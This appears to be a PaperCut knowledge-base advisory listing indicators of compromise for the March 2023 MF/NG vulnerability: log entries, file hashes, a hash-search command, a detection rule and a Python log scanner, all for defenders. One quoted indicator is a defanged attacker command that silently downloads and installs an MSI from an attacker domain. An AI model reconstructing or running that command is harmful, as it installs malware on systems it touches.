PaperCut vulnerability (March 2023) - Indicators of Compromise (IOCs)
Source: https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#faqs
How do I know if my server has been exploited?
We currently recommend looking for the following Indicators of Compromise (IOCs) to determine whether it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging, and endpoint protection software, you may be able to detect the following.
- If you see suspicious activity or security alerts in antivirus, anti-malware, and endpoint security software tooling.
- If you see suspicious PaperCut MF application log entries, i.e.:
  - User “admin” logs into the administration interface
  - Admin user “admin” modified the print script on the printer
  - User “admin” updated the config key “…” (where the config key is not one you’ve deliberately changed)
  - User “[setup-wizard]” modified a config key
- If your Application Server logs happen to be in debug mode, check to see if there are lines mentioning `SetupCompleted` at a time not correlating with the server installation or upgrade. Server logs can be found e.g. in `[app-path]/server/logs/*.*`, where `server.log` is normally the most recent log file.
- Domains in DNS or web proxy logs:
- New suspicious entries in the SSH authorized_keys file.
- New print scripts in the setup. Review the ‘Scripting’ configuration of each printer (and device) in PaperCut MF/NG admin.
- SHA256 hashes of files on local system:
- setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
- ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
You can search the entire system for the hashes above:
```powershell
Get-ChildItem "_search_location_" -Recurse -File | Get-FileHash | Where-Object Hash -eq _hash_here_ | Select-Object Path
```
Replace `_search_location_` with the directory you wish to search (this can also be an entire drive, e.g. `C:\`) and `_hash_here_` with the hash of the file you wish to find. `Get-FileHash` uses SHA256 by default, and `-File` skips directories, which `Get-FileHash` cannot hash.
- PowerShell scripts with content similar to:
```
cmd /c "powershell.exe -nop -w hidden Invoke-WebRequest 'hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi' -OutFile 'setup.msi' " cmd /c "msiexec /i setup.msi /qn IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1"\\@@
```
- Detection via YARA Rule on SIEM:
```yaml
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: "\\pc-app.exe"
    Image|endswith:
      - "\\cmd.exe"
      - "\\powershell.exe"
  condition: selection
level: high
falsepositives:
  - Expected admin activity
```
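As an added example (not part of the PaperCut KB or the Huntress rule), the following Python checks two of the indicators above against constructed data: it scans sample application-log lines for the “admin” / “[setup-wizard]” / `SetupCompleted` entries, with allowances for keys you changed on purpose and for a genuine install window, and it mirrors the selection logic of the process_creation rule above. The log line format and the config key names are assumptions.

```python
import re

# Constructed sample lines in the style of a PaperCut MF/NG server.log; the
# exact format and the config key names are assumptions, not real entries.
SAMPLE_LOG = """\
2023-04-13 10:02:11 INFO  User "alice" logged into the administration interface
2023-04-14 03:17:45 INFO  User "[setup-wizard]" modified config key "example-key-a"
2023-04-14 03:17:46 INFO  User "admin" updated the config key "example-key-b"
2023-04-14 03:18:02 INFO  Admin user "admin" modified the print script on the printer "example-printer"
2023-04-14 03:18:05 DEBUG SetupCompleted
"""

# One regex per suspicious application-log entry listed above.
PATTERNS = {
    "admin_login": re.compile(r'User "admin" logged into the administration interface'),
    "setup_wizard_config_change": re.compile(r'User "\[setup-wizard\]" modified .*config key'),
    "admin_config_change": re.compile(r'User "admin" updated the config key "([^"]*)"'),
    "admin_print_script_change": re.compile(r'Admin user "admin" modified the print script'),
    "setup_completed": re.compile(r"\bSetupCompleted\b"),
}

def scan_papercut_log(text, expected_keys=(), install_window=None):
    """Return (line_no, indicator, line) for each suspicious entry.
    expected_keys: config keys you changed deliberately (not reported).
    install_window: ("YYYY-MM-DD HH:MM:SS", "...") pair covering a genuine
    install or upgrade; SetupCompleted inside it is not reported."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            if name == "admin_config_change" and m.group(1) in expected_keys:
                continue
            if name == "setup_completed" and install_window:
                ts = line[:19]  # ISO timestamps compare correctly as strings
                if install_window[0] <= ts <= install_window[1]:
                    continue
            findings.append((no, name, line.strip()))
    return findings

def matches_pc_app_shell_spawn(event):
    """Python rendering of the process_creation rule above: pc-app.exe
    spawning cmd.exe or powershell.exe. event is a dict of Sysmon/EDR fields."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return parent.endswith("\\pc-app.exe") and (
        image.endswith("\\cmd.exe") or image.endswith("\\powershell.exe"))
```

Run `scan_papercut_log` over the contents of `server.log` and review every hit; a `SetupCompleted` outside your known install window and any config change you did not make yourself are the entries worth escalating.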
If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, rebuilding the Application Server, and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior. In addition, we recommend you implement your security response procedures and carry out best practices around potential compromise. Also see the “How do I retain my data when restoring my Application Server?” question below.
We will update this question with more details as we find more information from our customer base and security community.